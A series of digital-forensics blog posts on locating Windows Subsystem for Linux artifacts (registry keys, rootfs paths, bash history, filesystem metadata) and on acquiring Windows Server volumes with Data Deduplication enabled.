Further Forensicating of Windows Subsystem for Linux

This is a short follow up to my two recent posts, 'Windows Subsystem for Linux and Forensic Analysis' and 'Forensic Analysis of Systems that have Windows Subsystem for Linux Installed'. No sooner had I pressed publish on the latter, than a new Windows Insider Program update was pushed to my PC. Prior to this update my attempts to install openSUSE and SLES were failing repeatedly so I was unable to test whether multiple userlands could be installed side by side. The update appeared to have resolved the issue, so I was keen to dive in and confirm the answer to that niggling question. Unfortunately for me, it opened a can of worms which necessitated this follow up post to expand upon, and in some instances correct, its predecessors.  

The immediate question was quickly answered. Can an individual user install multiple userlands/ distributions side by side:

Yes. They. Can.

Per the screenshot, I successfully installed four userlands side by side, Ubuntu (via Beta install method), Ubuntu (Via Windows Store), openSUSELeap (Via Windows Store) and SUSELinuxEnterpriseServer (Via Windows Store). This begs the question, where are the corresponding files for these distinct Linux user land installs. The eagle-eyed reader may have cottoned onto the fact that two instances of Ubuntu could be installed, one using each of the two installation methods. In my prior testing I was limited to Ubuntu installed via the Beta installation method, however the other three installations are completed using the Windows Store. 

Detecting Windows Subsystem for Linux (installed via Windows Store)

As per my previous posts, if you install WSL using the beta method the Bash executable will be found at:

i.e. 'C:\Windows\System32\bash.exe'

However, installation of any of the three currently available userlands via the store causes both the application files and the associated filesystem to be installed in different locations. The installation is still on a per user basis, so the points raised regarding activity attribution still stand. The core executable associated with each of the currently available userlands can be found at:

C:\Program Files\WindowsApps\CanonicalGroupLimited.UbuntuonWindows_1604.2017.922.0_x64__79rhkp1fndgsc\ubuntu.exe
C:\Program Files\WindowsApps\46932SUSE.openSUSELeap42.2_1.1.0.0_x64__022rs5jcyhyac\openSUSE-42.exe
C:\Program Files\WindowsApps\46932SUSE.SUSELinuxEnterpriseServer12SP2_1.1.0.0_x64__022rs5jcyhyac\SLES-12.exe

This location is liable to change with future application and Windows updates. Similarly, the location of the root file system for each is quite different from the location where the Beta version installs.

To summarise my previous posts, installs of ‘Bash for Ubuntu for Windows’ using the beta installation method cause notable files to be created within C:\Users\[Username]\AppData\Local\lxss, with specific subfolders for the home, root and rootfs which are then mounted when Bash is executed. Installation of any of the currently available userlands via the Windows Store now creates the associated file system within the packages directory for that application. The current paths where the rootfs is located for each install is as follows:


This location is also liable to change with future application and Windows updates. What is notable is that while the beta install separates /, /home and /root into distinct locations which are individually mounted, the 'rootfs' directory is mounted as / and thereafter /home and /root exist within that structure. You may recall that one benefit of the beta method is that when a user uninstalled WSL then the /rootfs directory was deleted but /home was left intact and data which may be pertinent to a case was preserved, unfortunately for us this is no longer the case. If a user chooses the uninstall option either via the store or by right clicking in the start menu shortcut all user data is also removed.

The Beta install also created a notable Registry key at:


However, after a Windows update and installing subsequent additional userlands, this key and its content have been moved one layer deeper, and they can now be found at:


Additional values have also been added, per the below screenshot, you will note that there is now a DistributionName value, for Beta 'Bash on Ubuntu on Windows' installs which is set to... 'Legacy'. Evidencing that the timing of my previous posts was impeccable as ever:

{12345678-1234-5678-0123-456789abcdef} Registry Key

The '{12345678-1234-5678-0123-456789abcdef}' is the distro_guid associated with the particular distribution, and as such, analysis of the contents of the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss key will allow you to identify which userland environments are currently installed for any particular user. At the time of writing there are four distro_guid keys you may observe:

  1. {12345678-1234-5678-0123-456789abcdef} - "Legacy" (Bash on Ubuntu on Windows)
  2. {b651c2ea-ab01-46ae-8c95-09209e4272fd} - SLES-12
  3. {d4085d24-9def-43b3-9a17-de87d9bba371} - openSUSE-42
  4. {ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} - Ubuntu

The SLES, openSUSE and Ubuntu keys contain three additional values which are not found for the legacy install. Specifically, 'DefaultEnvironment' (REG_MULTI_SZ), 'KernelCommandLine' (REG_SZ) and 'PackageFamilyName' (REG_SZ). A screenshot of one example for {ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} (Ubuntu), is provided below:

{ff9afada-c0e4-4c9c-ac50-e5fb13b4b142} Registry Key

By default, DefaultEnvironment and KernelCommandLine were found to be the same for all three of the tested userlands but may be modified by a user or in later updates. 'DefaultEnvironment' contains environment variables and 'KernelCommandLine' contains, you guessed it, the kernel command line statements. Their values are detailed below for reference.


BOOT_IMAGE=/kernel init=/init ro

The PackageFamilyName contains a single string which relates to the AppStore package name, and as such can help identify the correct file system for active installs. For our three userlands the values were:


As detailed earlier in the post, the application path and file system locations contain the same strings.

Analysis of Windows installed applications has a number of other implications which I won't explore at this time. This includes the fact that there are a myriad of additional data sources which relate to the user activity with regard to Windows Store installed Applications, and the fact that prefetch is not created or updated (unlike when launching Bash installed via the Beta method).


Forensic Analysis of Systems that have Windows Subsystem for Linux Installed

*** EDIT 2017-10-17 ***

Windows Subsystem for Linux was in Beta at the time of writing and all artifacts/ paths mentioned relate to installation of WSL/ 'Bash on Ubuntu on Windows', using the Beta methodology detailed in my last post. Installation of a Linux userland via the Windows Store causes notable files to be located elsewhere within Windows. This is addressed in my addendum post 'Further Forensicating of Windows Subsystem for Linux'.

*** /EDIT 2017-10-17 ***

In my last post I provided a little bit of background on Windows Subsystem for Linux ('WSL') and provided details on some of the artifacts you can look out for to identify if it has been installed and enabled. In this post we will dive into a few of the notable artifacts which speak to user activity within WSL and also some considerations when reviewing this information. The more you look the more you find, and there are a myriad of interesting edge cases you may come across. The relevance of any particular artifact will depend on your investigation and the way the suspect/user was using WSL.

In this post I will be focusing on a few specific artifacts, particularly those which relate to user activity and which have unique aspects as they relate to WSL when compared to their counterparts in a full Linux host. This is by no means a comprehensive list as the topic could and does fill multiple books, written by far smarter people than me.

Forensically Interesting Artifacts

One point to note is that where I specify an artifact location I will be referencing its location on disk as it appears when viewed in Windows or during dead box analysis this will be the path displayed in tools. Paths as they appear to the user within WSL will be different due to the various mount points that are employed, this is addressed further later in the post.

It is key to note that the installation of WSL is user specific, so there may be multiple instances of WSL installed on one system. How many you will find will depend on the number of user accounts and the number of those users who have installed a userland. My reading indicates that multiple userlands can be installed side by side, but I have yet to experiment with this. In any event, it's something to look out for and if it is indeed possible, I would assume that it will result in multiple locations to analyse per user.

Default Username

As previously mentioned, the userland installation is per user. Additionally, authentication is entirely independent of Windows authentication/ login credentials. A user is requested to define a UNIX username and password when they first run Bash. All data associated with the filesystem for the Linux userland is contained within the associated Windows users profile at %localappdata%\Lxss\. In this MSDN blog post Microsoft elaborate on this, saying "Each Windows user has their own WSL environment, and can therefore have Linux root privileges and install applications without affecting other Windows users".

It should therefore be noted that irrespective of the chosen Linux username any activity identified within a particular WSL install can/should be attributed to the corresponding Windows User Account. To labour the point and make this abundantly clear, some example scenarios are outlined below, the examples are based on a Windows system with multiple users, 'UserA', 'UserB', etc:

Scenario 1: User 'UserA' installs WSL and 'Bash on Ubuntu on Windows' and sets their Linux username as 'UserA'. Based upon human nature it is likely that a significant proportion of users will use the same username and password for WSL as they do for Windows. This is probably the most common scenario you will encounter.

Scenario 2: User 'UserA' installs WSL and 'Bash on Ubuntu on Windows' however sets their UNIX username to be 'UserB'. At a glance artifacts associated with the WSL user 'UserB' may seem to relate to the Windows User 'UserB' however they should in fact be attributed to 'UserA'. For example, the .bash_history file for this user will be located at:


i.e. within the windows profile associated with UserA, the same can be said for almost all notable artifacts as they relate to WSL and user activity.

Scenario 3: Users 'UserA' and 'UserB' both install WSL and 'Bash on Ubuntu on Windows' and set their UNIX usernames as 'UserC'. These two installations are completely distinct and there is no connection between the two 'UserC' accounts despite them sharing a name.

The key point to note is that installations are user specific, independent from one another and the majority of relevant artifacts will exist within a Windows User directory or NTUSER.DAT for a specific associated Windows User Account.

The username configured at the time of installation is recorded within the NTUSER.DAT for the associated Windows user at the location below:

Key: SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss
Value: DefaultUsername (RegSz)
Data: [username]

Various other registry keys were identified which relate to lxss and Windows Subsystem for Linux however the majority of notable artifacts, particularly as they relate to user activity are to be found on disk.

Prefetch Files

As mentioned in my previous post, Bash itself, as it relates to ‘Bash on Ubuntu on Windows’, is an executable located at %systemroot%\System32\bash.exe. When a user selects the ‘Bash on Ubuntu on Windows' shortcut, either from the desktop, start menu or taskbar, bash.exe is executed with an argument of ‘~’ and the user is presented with a new window placing them within Bash at the home directory of the default user. This causes the bash.exe prefetch file to be updated, assuming prefetch is enabled. This may provide some useful information as to the last and recent run times associated with the executable, which will evidence the use of Bash.

With that said, Bash can be accessed in a number of ways including by executing the 'bash' command from within the cmd prompt or from a PowerShell prompt. Neither of these execution methods cause the bash.exe prefetch file to be updated. Running the bash command from the run dialog does update the associated prefetch file.

Another detail which is notable regarding executing the ‘bash’ command from a cmd or PowerShell prompt is that this will not place the user at their WSL home directory but rather at the location which the cmd/ PowerShell prompt was previously pointing.

WSL User Accounts/ Credentials

As you might expect the passwd and shadow files will be your go to location for details of the users who are set up within a specific WSL install and their associated credentials. These are located at:



These files and their respective backups 'shadow-' and 'passwd-' can be reviewed for useful information regarding the users who have been configured within WSL. The password hashes for these accounts can be extracted from the shadow file for cracking, should this be useful in your case.

Bash History

When determining user activity on a Linux system, the bash history is often the first port of call. The .bash_history file maintains a record of a user's command history within Bash. WSL systems with Bash for Windows installed are no exception and the bash_history file for each user can be located at:


and for root:


Anyone familiar with investigating breaches of Linux systems will likely be aware that the .bash_history file is a fantastic asset during analysis, unfortunately so do the bad guys and it’s common for attempts to be made to clear it. Additionally, the Bash history is often a far from comprehensive log as it can fail to be populated under various circumstances; can behave strangely when multiple instances of bash are used simultaneously; and by default, it lacks timestamps. The behaviour of bash history under various edge cases is an interesting topic in itself and indeed it is the topic of a great presentation by Hal Pomeranz titled 'You Don't Know Jack About bash_history' a recording of which is available here.

Key points to note when reviewing the bash history under WSL:

  • Bash history file can be deleted from within Bash
  • Bash history file can be deleted from Windows
  • By default, the bash history file is only populated when a shell exits
  • Bash history file may not be populated depending on how Bash exits

Unfortunately, by default .bash_history is only populated when Bash for Windows closes cleanly. If the task is killed from task manager, or if the user simply closes the window using the close button rather than typing 'exit' then the bash_history file is not updated with the commands from that session. Windows users are somewhat accustomed to closing windows down with the close button and so I expect that bash history will be less complete for WSL when compared to a regular Linux system.

If a suspect deletes the Bash history outright, either using Bash or via Windows, there is the potential to recover the deleted file. You are likely to be at the added advantage that the file will be deleted from an NTFS filesystem as opposed to those you commonly encounter when analysing Linux systems, often making recovery easier. Further benefits of this Windows/Linux hybrid environment you are analysing include the fact that a Volume Shadow Copy may contain historical copies of the .bash_history file.

An additional area for future research will be the recovery of bash history for live or ungracefully closed sessions from RAM captured from the Windows host. It’s a fairly niche case but conceivably, if you are able to capture a RAM image of a live system where an open Bash session exists the bash history (yet to be written to disk) may be recoverable from RAM. A debatable alternative is of course to gracefully close Bash prior to performing disk imaging, causing the .bash_history to be populated with the latest sessions data, but you know your case and jurisdictional restrictions better than I do so make sure you are on the right side of them.

Other Artifacts

It would be futile to attempt to detail and discuss all relevant artifacts within this post. Artifacts such as the files contained within '.ssh' or ‘.gnupg' or values in '.viminfo' (which may be relevant depending on your case) can be found where you would expect them. Various log files, with some notable exceptions (such as syslog) are to be found within the same location as you might expect to find them in an Ubuntu install.

One key area which has impact on analysis is the way WSL interacts with the host Windows file system and vice versa.

Filesystem Interaction (Accessing the Windows filesystem from WSL)

The first point to note about filesystem interaction is that the root filesystem for WSL exists within a directory on the local OS volume which will commonly be formatted with NTFS. This has significant implications in forensic analysis, including what metadata is stored for files and the likelihood of recovering deleted data. As alluded to earlier, the full directory structure associated with WSL is subject to Volume Shadow Copy and as such historical copies of files may be recoverable from that source, I have successfully used this to recover bash history that was otherwise unavailable.

Fixed storage devices associated with the host filesystem are presented to WSL as mounted devices at /mnt/[driveletter], and by default the 'noatime' attribute as set. e.g.:

Example content of /proc/mounts:
rootfs / lxfs rw,noatime 0 0
data /data lxfs rw,noatime 0 0
cache /cache lxfs rw,noatime 0 0
mnt /mnt lxfs rw,noatime 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0
none /dev tmpfs rw,noatime,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,noatime 0 0
none /run tmpfs rw,nosuid,noexec,noatime,mode=755 0 0
none /run/lock tmpfs rw,nosuid,nodev,noexec,noatime 0 0
none /run/shm tmpfs rw,nosuid,nodev,noatime 0 0
none /run/user tmpfs rw,nosuid,nodev,noexec,noatime,mode=755 0 0
C: /mnt/c drvfs rw,noatime 0 0
D: /mnt/d drvfs rw,noatime 0 0
root /root lxfs rw,noatime 0 0
home /home lxfs rw,noatime 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,noatime 0 0

Prior to writing this post I was under the impression that to access a volume from within WSL it had to be formatted as NTFS or ReFS. However, per this MSDN blog from April, it appears support for additional filesystems has been added, although the requisite update is only available via the Windows 10 Insider Preview at the moment. In any event, I will focus on NTFS as in the majority of cases this is likely the file system onto which WSL will have been installed.

The way Microsoft have implemented the filesystem, so as to emulate Linux behaviour while the data actually resides upon an NTFS or ReFS volume is an interesting topic, and one which is covered well in an MSDN blog post here. To quote and paraphrase: "WSL provides access to Windows files by emulating full Linux behavior for the internal Linux file system with VolFs, and by providing full access to Windows drives and files through DrvFs. As of this writing, DrvFs enables some of the functionality of Linux file systems, such as case sensitivity and symbolic links, while still supporting interoperability with Windows". 

"When opening a file in DrvFs, Windows permissions are used based on the token of the user that executed bash.exe. So in order to access files under C:\Windows, it’s not enough to use “sudo” in your bash environment, which gives you root privileges in WSL but does not alter your Windows user token. Instead, you would have to launch bash.exe elevated to gain the appropriate permissions.

"VolFs is used to mount the VFS root directory, using %LocalAppData%\lxss\rootfs as the backing storage. In addition, a few additional VolFs mount points exist, most notably /root and /home which are mounted using %LocalAppData%\lxss\root and %LocalAppData%\lxss\home respectively. The reason for these separate mounts is that when you uninstall WSL, the home directories are not removed by default, so any personal files stored there will be preserved."

The architecture of VFS within WSL as used to facilitate interoperability is conveyed in the below diagram which is taken from the same blog post:

The really useful MSDN blog posts by Jack Hammons as they relate to WSL should be considered compulsory reading if you find yourself performing a complex analysis of WSL.

This approach means that the full host file system (assuming fixed NTFS/ ReFS volumes) is accessible from within WSL. Linux tools can be used to view, modify and delete data/files on the fixed disks without leaving the traces we might expect to find were a user to perform similar actions via Windows Explorer. The facility to view, and modify data without leaving traditional traces may be attractive to malicious users. Additionally, commands such as 'touch' and 'shred', which are available by default, may be tempting to the savvy WSL user who is looking to perform antiforensics.

The fact that the WSL files exist within an NTFS filename not only impacts the likelihood of recovery but it also creates some interesting scenarios. One such example is that it is possible to create files using Linux's case sensitivity which have filenames which are identical, other than their case. Per the below screenshot, it is possible to use WSL to create files which explorer would not normally permit:

Three files created using Windows Subsystem for Linux

While this is possible via WSL, various windows applications aren't going to like it. Windows can in fact support case sensitivity, it is supported in NTFS and can be switched on by modifying the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\ dword:ObCaseInsensitive registry value. But by default, this support isn't enabled and irrespective of this WSL will allow case sensitive filenames to be created as per the screenshot. Attempting to copy the files to another location causes errors.

This hybrid filesystem approach also has an interesting (and forensically useful) implication for file metadata. Recording file creation (or birth) is not supported by many common Linux file systems and indeed many Linux applications lack support for reading this attribute despite support being introduced in some modern file systems such as ext4. However, the WSL file system exists within an NTFS volume and despite the fact that it cannot be queried or modified from within WSL, a file created timestamp is recorded within the MFT for files created using WSL. This could prove forensically useful in all manner of cases.

Filesystem Interaction (Accessing the WSL filesystem from Windows)

As detailed above, VolFS and DrvFS are employed to mount different parts of the WSL file system and this has implications on file behaviour between these two locations. Specifically, VolFs is used to mount the VFS root directory, /root and /home while DrvFS is used for any local fixed drives as well as removable media and network shares with the addition of support for these. 

Focusing on the core WSL file structure as located within %LocalAppData%\lxss, direct manipulation (from Windows) of data within that directory structure will not necessarily be reflected within WSL. Windows does not have a concept of inodes and as such VolFs (in an effort to provide support for most VFS features) is required to maintain a separate record of inodes and their associated Windows file objects. If a Windows application (e.g. Explorer or Notepad) are used to create a file in a WSL home directory then that file will not be visible to the WSL user because VolFs was not employed in the creation of the file so certain attributes are missing, causing VolFS to ignore it when access is attempted from witin WSL.

The same occurs with file modification, if a file within a VolFs mounted file system is modified from Windows the MFT metadata will be updated to reflect the new last modified time, however the stat command within WSL will show the original values. Viewing the contents of the file MAY show the correct updated content as the file is accessed on disk (or you may experience corruption/ the files may disappear from view). The reason for this is detailed by Microsoft as such:
"While VolFs files are stored in regular files on Windows in the directories mentioned above, interoperability with Windows is not supported. If a new file is added to one of these directories from Windows, it lacks the EAs needed by VolFs, so VolFs doesn’t know what to do with the file and simply ignores it. Many editors will also strip the EAs when saving an existing file, again making the file unusable in WSL. 
Additionally, since VFS caches directory entries, any modifications to those directories that are made from Windows while WSL is running may not be accurately reflected."
The various attributes which are not natively supported by NTFS but are required by VolFs to best mimic Linux file system behavior are stored in NTFS Extended Attributes associated with the associated file. I'm pleased to report that the previously mentioned Microsoft MSDN blogs go into reasonable detail on this, going so far as to detail which information is stored in EAs, reproduced below:
  • "Mode: this includes the file type (regular, symlink, FIFO, etc.) and the permission bits for the file.
  • Owner: the user ID and group ID of the Linux user and group that own the file.
  • Device ID: for device files, the device major and minor number of the device. Note that WSL currently does not allow users to create device files on VolFs.
  • File times: the file accessed, modified and changed times on Linux use a different format and granularity than on Windows, so these are also stored in the EAs
  • In addition, if a file has any file capabilities, these are stored in an alternate data stream for the file. Note that WSL currently does not allow users to modify file capabilities for a file.The remaining inode attributes, such as inode number and file size, are derived from information kept by NTFS."
There is therefore the potential to examine the Extended Attributes to determine the Linux metadata associated with individual files. I say the potential, because fully documenting the way Extended Attributes are used by the Windows Subsystem for Linux is beyond the scope of this post. A screenshot of an example file is provided below:

Historical Windows Subsystem for Linux data 

One final takeaway from my various reading was the obviously conscious decision by the WSL development team to separate the rootfs, root and home filesystem and mount them independently. This is evidently done to facilitate the preservation of user data if/when WSL is uninstalled. This preservation is the default behaviour and as such when analysing a system which has had WSL disabled/ uninstalled there are likely to be potential sources of evidence in the home directories which have not been removed (assuming the user hasn't gone out of their way to remove them).

There is a shedload of useful information on the MSDN blog regarding WSL. Much of which I only discovered after hours of tinkering, but this link blogs.msdn.microsoft.com/wsl will be invaluable if you find yourself having to analyse a system where WSL was used by a suspect.


Windows Subsystem for Linux and Forensic Analysis

*** EDIT 2017-10-17 ***

Windows Subsystem for Linux was in Beta at the time of writing and all artifacts/ paths mentioned relate to installation of WSL/ 'Bash on Ubuntu on Windows', using the methodology detailed in this post. Installation of a Linux userland via the Windows Store causes notable files to be located elsewhere within Windows. This is addressed in my addendum post 'Further Forensicating of Windows Subsystem for Linux'.

*** /EDIT 2017-10-17 ***

This is the first of two posts on the topic of the Windows Subsystem for Linux. In this pair of posts I hope to highlight the importance of being aware of Windows Subsystem for Linux when analysing certain systems, methods to identify its presence and forensically interesting artifacts for analysis. As with my last pair of posts, it seemed logical to break this topic down into two posts, a primer on Windows Subsystem for Linux (WSL) and how to identify it is installed on a system you are analysing, and a second post on the location of forensically interesting artifacts and other considerations during analysis.

Windows Subsystem for Linux

On 02 August 2016 Microsoft released Windows 10 Anniversary Update, and with it they handed users the Windows Subsystem for Linux (‘WSL'). WSL lets developers run Linux environments (including most command-line tools, utilities, and applications) directly on Windows, unmodified, without the overhead of a virtual machine. The majority of people I know (myself included) use Windows Subsystem for Linux to install 'Bash on Ubuntu on Windows', indeed Ubuntu was the only userland available at release although openSUSE and SUSE Linux Enterprise Server are both now downloadable and Fedora is apparently in the wings.

Ubuntu, openSUSE and SUSE Linux Enterprise Server in the Microsoft Store

Still more recently Microsoft announced that they were bringing WSL to
Windows Server. Microsoft consider this a Beta feature for Windows 10; however I believe it will be fully supported as of Fall Creators Update, expected to launch next month.

Evidently this is a feature in its infancy, with various aspects still only available via the Windows Insider program and further additional userlands (e.g. Fedora) promised, but yet to materialise. While WSL was initially marked as a beta feature at release, that hasn't stopped lots of keen users from installing it.

Personally, I installed Anniversary Update on my day-to-day system as soon as it was available and enabled Windows Subsystem for Linux immediately thereafter, the prospect of being able to drop into Bash and use Linux native commands was too much to resist. Since then I have employed the update and added WSL to my analysis machines and workflow. I was also able to run the old SIFT bootstrap script (with some modification) to install the myriad of tools available within SIFT to my WSL system. Full disclosure, this was a messy process which I have attempted to emulate more recently using SIFT CLI without success (yet!), I have not rolled this out to any of my analysis systems and I wouldn't recommend doing as such.

Windows Subsystem for Linux has recently garnered attention from the infosec community due to the perceived risk of 'bashware', i.e. the use of WSL to run malware which may be able to bypass Windows security software and protections. At the time of writing I believe that this has only been performed as a proof of concept and I am unaware of any instance where it has been seen in the wild. With this development in mind, analysis of artifacts associated with WSL will need to be a consideration when performing certain investigations. But this is by no means the only reason to be aware of forensic artifacts associated with WSL.

I have worked cases where the crux of the matter related to actions performed by the suspects while using Cygwin, in other cases all malicious activity was performed within a virtual machine running Linux on a Windows host. In both these scenarios it is easy for an investigator who has fallen into the Windows Forensics mindset to completely miss the presence of Linux artifacts which require analysis, and the same issue arises when we are confronted with a system with WSL enabled.

Installing Windows Subsystem for Linux

Analysis of a system with WSL does not require the investigator to install WSL themselves, however it will likely prove useful for testing the behavior of artifacts and validating statements in this post. With that in mind, the full official instructions are available here, but the edited highlights are as follows:

With Internet Access
Ensure you are running Windows 10 Anniversary Update or later (build 1607+) on a 64-bit system.

Enable WSL via the Windows Features dialog accessible from Control Panel -> Programs -> Programs and Features -> Turn Windows features on or off and select the check box for Windows Subsystem for Linux (Beta), per the below screenshot:

Enabling WSL from the Windows Features

Alternatively, the same can be achieved with the PowerShell command:

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Next we need to install the distribution of choice. 

Members of the 'Windows Insider Program' can download Ubuntu, openSUSE or SLES via the Microsoft store. Once installed, select launch and you will be prompted to create a UNIX user account. Once the account is created you are good to go.

The process is slightly more involved if you aren't a member of the Windows Insider Program. The installation can be performed by running the bash command command, however you will need to enable Developer Mode first. Enable Developer mode via:

Settings -> Update and Security -> For developers and select the Developer Mode radio button.

Once developer mode is enabled, launch a command prompt and execute the command 'bash', this will prompt you to accept the license with 'y' and once accepted the Ubuntu user-mode image will be downloaded and extracted. 

A new "Bash on Ubuntu on Windows" shortcut is added to the start menu, or alternatively it can be accessed by running the 'bash' command from the command prompt again. When you first launch Bash you will be prompted to create a UNIX user account. Once the account is created you are good to go. Note however that while the version at the windows store is relatively up to date this version is not, and as such it is advisable to run 'apt-get update' at this time.

Without Internet Access
The above instructions require an internet connected machine, which is a no go for many lab environments. Unfortunately, Microsoft do not offer an offline installer so we have to find an alternative solution. 

There are two methods I have identified to get around this. The easier of the two is to use a program LxRunOffline (https://github.com/DDoSolitary/LxRunOffline) written by DDoSolitary which (per the readme) "uses InternetOpenUrl() in wininet.dll to download the files required. This application uses EasyHook to inject code to its process, and hooks this function and some others related. Then the download requests can be redirected to local files". This does of course require you to trust the code written by an internet stranger within your airgapped lab, or to perform a full code review and compile it yourself. Full instructions for the process are available here and consider it "at your own risk".

My preferred method is to host the Canonical image on a temporary internal web server, intercept the request made by lxrun to Microsoft's servers with fiddler and redirect to the downloaded version. Instructions are provided here.

Whichever method you use, once installed a new "Bash on Ubuntu on Windows" shortcut will be added to the start menu. You can access Bash by clicking the shortcut or by running the 'bash' command from a command prompt. When you first launch Bash you will be prompted to create a UNIX user account. 

Detecting Windows Subsystem for Linux (BETA)

Note these locations relate to the Beta version of WSL. Installations via the Windows Store are now located within the associated App install folder.

Enabling Windows Subsystem for Linux and installing one of the available userland offerings causes a huge number of changes to a system. There are a number of things you can look out for to confirm its installation. The simplest indicator of WSL being installed for at least one user is the presence of the Bash executable at:


i.e. 'C:\Windows\System32\bash.exe

Additionally, the installation of 'Bash on Ubuntu on Windows' results in the creation of a 'HKLM\COMPONENTS\CanonicalData' key, as well as a huge number of other keys associated with enabling WSL, enabling developer mode and installing Bash. I have focused on Ubuntu in this post because at the time of writing it is the default userland and installation of alternatives requires membership of the Windows Insider program (or a manual unsupported installation). As other userland offerings reach general release we will start to see them in the wild more often, although I anticipate Ubuntu will remain dominant for some time.

It should be noted that installation of WSL is on a per user basis, this is of particular importance as we look to forensically interesting artifacts. On a multiuser system each Windows user has to install Bash independently, the associated filesystem is within the user's %localappdata% location and notable registry keys are stored within their NTUser.dat. Subsequently, on disk you can also look out for the presence of the Linux filesystem (for each individual user) located at:


i.e. 'C:\Users\[Username]\AppData\Local\Lxss\rootfs'.

In addition to checking for the presence of the Bash executable or the 'Lxss\rootfs' directory, the existence of the following registry key within an individual users NTUSER.DAT indicates that Bash is installed and configured for that user:


We will revisit this key and its contents when we look to forensically interesting artifacts in my next post.


Forensic Analysis of volumes with Data Deduplication Enabled

In this post I hope to outline a number of options available to analysts when performing a forensic analysis of Microsoft Windows Servers that have the "Data Deduplication" feature enabled. If you are unfamiliar with the Data Deduplication feature and want additional detail on it and it's impact on forensic investigations then see my last post.

The first half of this post addresses Acquiring Volumes which you know to contain Data Deduplication. However, if you already have a disk image and you are looking to extract the data after the fact, you can jump to the 'Handling images containing deduplicated data' section below.

Acquiring Volumes where you know Data Deduplication is enabled

If you happen to know in advance that the volume you wish to acquire has Data Deduplication enabled then you may be in a position to modify your acquisition approach.

As with any acquisition the most appropriate methodology is going to be dependent on the reason for the acquisition as well as any local policies or legal constraints. I would always suggest best practice dictates that a full physical disk image (or volume image) be your starting point, and the presence of Data Deduplication doesn't impact that statement.

Coming into this exercise I had a vague hope that performing a live acquisition of the logical volume may circumvent the issue of Data Deduplication, much like it circumvents the issues with many varieties of Full Disk Encryption (FDE). However, as soon as I started to look under the hood I immediately saw why that wasn't the case, not least of all because it is possible to store more deduplicated data within a volume than would fit were the data duplicated.

If you are presented with Data Deduplication then the most forensically sound method to acquire the data will be to perform a full disk image in the usual manner, or capture a copy of VMDKs/VHDs for virtual servers per your usual methodology, and then to extract/ deduplicate the data after the fact. The key caveat associated with this proposal is that it requires that you are in a position to spin up a Windows Server 2012/ 2016 box (with the associated licensing constraints which come with this). Alternatively, it may be possible to access the data after the if you are able to virtualise a copy of the server you have acquired. This may be possible via the use of tools such as Live View or Forensic Explorer.

If you aren't able to perform any of the above then I would still recommend capturing a full image as a starting point. While you might not be able to take the best practice approach at this stage you never know when this might change or who you may be required to provide evidence to and what their capabilities may be. Once you have secured your best evidence copy, it may be worth capturing key data via an active file collection method such as FTK Imagers "Contents of a Folder" option to AD1 or using EnCase to create an L01 while you have access to the original live system.


Unoptimization is the process of reversing Data Deduplication for any particular volume and returning it to a duplicated state, rehydrating the individual files and replacing the reparse points with these files. This may seem like an appealing option when acquisition of a volume with Data Deduplication enabled is required, i.e. Unoptimize the volume prior to commencing the acquisition, but there are significant implications associated with this approach.

Firstly, it may not be possible to unoptimize a volume. Noting that the feature exists specifically to facilitate the storage of more data on a volume than could be stored in it’s original duplicated form, if the volume contains a significant quantity of duplicate data, or if it is nearing capacity it will not be possible to reverse the duplication due to a lack of space in the volume.

The implication of greatest concern to forensic practitioners is the fact that unoptimizing a volume will overwrite space that was otherwise unallocated, and may have contained useful deleted data. Nevertheless is may seem applealing to capture a forensic image of the volume to preserve that recoverable data, then to unoptimize the volume and capture a second image. Certainly, assuming the volume has adequate space to be unoptimized, that is an option which would satisfy the goal of getting access to all available data in a relatively convenient manner.

If you already have an image with optimization enabled and want to unoptimize the drive there are still further implications to be considered. These will be of varying significance depending on the system in question and the circumstances surrounding the requirement for the acquisition, but they include:

  • A significant length of time will be required to perform the acquisition. Capturing an image, duduplicating a potentially large volume and capturing a second image is going to take a long time. That’s more time at the controls, more time inconveniencing the system owner and more time for something to go wrong with a live, potentially business critical system.
  • The unoptimization process has a system impact. Usually optimisation happens on a few files at a time, on a scheduled basis and balanced against system load. If you are manually initiating a full unoptimization it will have a significant impact on IO and RAM usage. Depending on the function and load on the server this may not be acceptable.
  • Risk. Significant operations like disk imaging always carry some risk that an error occurs and system failure results. The same goes for unoptimization, as far as I am concerned it introduced unnecessary risk which is avoidable via the method outlined in this post. 

In case the above diatribe didn’t make it clear, I really do not recommend performing unoptimization on a source device to facilitate an acquisition, but I appreciate it may be the only option in some circumstances. Maybe.

With that said, reviewing the output from the PowerShell command Get-DedupStatus will provide an indication as to whether unoptimization is possible.

If the SavedSpace exceeds the Free Space then the drive cannot be fully Unoptimized. Assuming the volume can be Unoptimized then the following PowerShell command will initiate the process (replacing [volume] with the volume letter you wish to unoptimize:

Start-DedupJob [volume] -Type Unoptimization

This command will unoptimize the data on the volume and then disable Data Deduplication for that volume. The status of drive can then be checked with:


If running the Get-DedupStatus returns to the command prompt withot other input, per the screenshot below, then there are no longer any optimized volumes.

Once the job has completed and the volume is no longer optimized, you can acquire it as you would any other disk/volume image. Thereafter, the appropriate command or steps to reoptimized the drive back to it’s original state will depend on how it was initially configured. You can defer to the system owner/ administrator for this information (and really I hope you engaged with them before you even considered unoptimizing volumes on their server).

Handling images containing deduplicated data

If your only option is to capture a dead disk image, or you have captured an image unaware that the volume had Data Deduplication enabled then you will have to extract the data after the fact. In most instances this would be my recommended approach anyway, i.e. capture a regular disk image and perform post processing later. As alluded to above, I have not identified a method to reverse data deduplication, or to extract the data, which does not require access to a system running Server 2012 or Server 2016.

Mounting within virtual or physical server

The first point to note is that Data Deduplication in Server 2012 and Server 2016 is not fully interchangeable. A deduplicted volume created in Server 2016 cannot be accessed by Server 2012. However, it does appear to be backwards compatible, drives created in Server 2012 can be read from Server 2016.

Whether you have a logical volume image, a physical disk image or a flat VMDK/VHD from ESXi or Hyper-V, my preferred method to access them is via the "Image Mounting" feature of FTK Imager. In the below instructions I will detail the process to access the drive from a Windows Server 2016 Standard install however the process for Server 2012 is essentially identical (assuming the drive you are attempting to access was created using Server 2012).

